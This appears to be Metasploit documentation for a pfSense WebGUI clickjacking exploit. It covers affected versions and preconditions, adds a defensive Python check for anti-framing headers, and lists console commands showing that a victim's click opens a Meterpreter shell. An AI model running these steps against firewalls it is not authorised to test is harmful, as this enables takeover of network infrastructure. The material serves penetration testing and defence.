Path: blob/master/documentation/modules/exploit/unix/http/pfsense_clickjacking.md
Vulnerable Application
This vulnerability affects all pfSense versions prior to 2.4.2-RELEASE.
Vulnerable Setup
The victim must be able to access the WebGUI and must be logged in as admin for this exploit to work. The WebGUI's TLS certificate may also need to be trusted in the victim's browser.
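Clickjacking requires that the WebGUI can be loaded inside a frame on another origin. The following Python check is an added example, not part of the module or its documentation: it classifies a response's headers by whether the standard anti-framing controls (X-Frame-Options and CSP frame-ancestors) are in effect. The sample headers are constructed, and this page does not state which mechanism pfSense 2.4.2-RELEASE uses.

```python
# Added example (not Metasploit or pfSense code): decide from response headers
# whether a page can be framed by an arbitrary origin, the clickjacking precondition.

def frame_ancestors(csp_values):
    """Source list of frame-ancestors in each enforced CSP header that sets it."""
    found = []
    for value in csp_values:
        for directive in value.split(";"):
            parts = directive.lower().split()
            if parts and parts[0] == "frame-ancestors":
                found.append(parts[1:])  # [] matches no origin (same as 'none')
                break                    # a repeated directive is ignored by browsers
    return found

def is_open(sources):
    """True if the source list lets any origin frame the page ('*' or a bare scheme)."""
    return any(s == "*" or s.endswith(":") for s in sources)

def framing_verdict(headers):
    """headers: list of (name, value) pairs. Returns (protected, reason)."""
    csp = [v for n, v in headers if n.lower() == "content-security-policy"]
    xfo = {t.strip().upper() for n, v in headers
           if n.lower() == "x-frame-options" for t in v.split(",")}
    policies = frame_ancestors(csp)
    if policies:
        # Every enforced policy must allow the embed, so one restrictive policy is
        # enough. Browsers ignore X-Frame-Options when frame-ancestors is present.
        if any(not is_open(p) for p in policies):
            return True, "CSP frame-ancestors restricts embedding"
        return False, "CSP frame-ancestors allows any origin"
    valid = xfo & {"DENY", "SAMEORIGIN"}
    if valid:
        return True, "X-Frame-Options " + "/".join(sorted(valid))
    if xfo:
        return False, "X-Frame-Options value not honoured: " + ", ".join(sorted(xfo))
    return False, "no anti-framing header"

# Constructed sample responses, not captured from a real pfSense WebGUI.
SAMPLES = {
    "no header": [("Content-Type", "text/html")],
    "xfo sameorigin": [("X-Frame-Options", "SAMEORIGIN")],
    "obsolete allow-from": [("X-Frame-Options", "ALLOW-FROM https://portal.example")],
    "csp none": [("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'")],
    "report-only": [("Content-Security-Policy-Report-Only", "frame-ancestors 'none'")],
}

if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        print(name, framing_verdict(hdrs))
```

A response that comes back as unprotected from the admin interface is a candidate for upgrade or for adding the header at a reverse proxy.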
Verification Steps
use exploit/unix/http/pfsense_clickjacking
set TARGETURI https://<ip WebGUI>
exploit
Browse to the URL returned by MSF
Click anywhere on the returned page
Note that a new Meterpreter session was started.
Options
TARGETURI
The base path of the WebGUI. The default base path is https://192.168.1.1/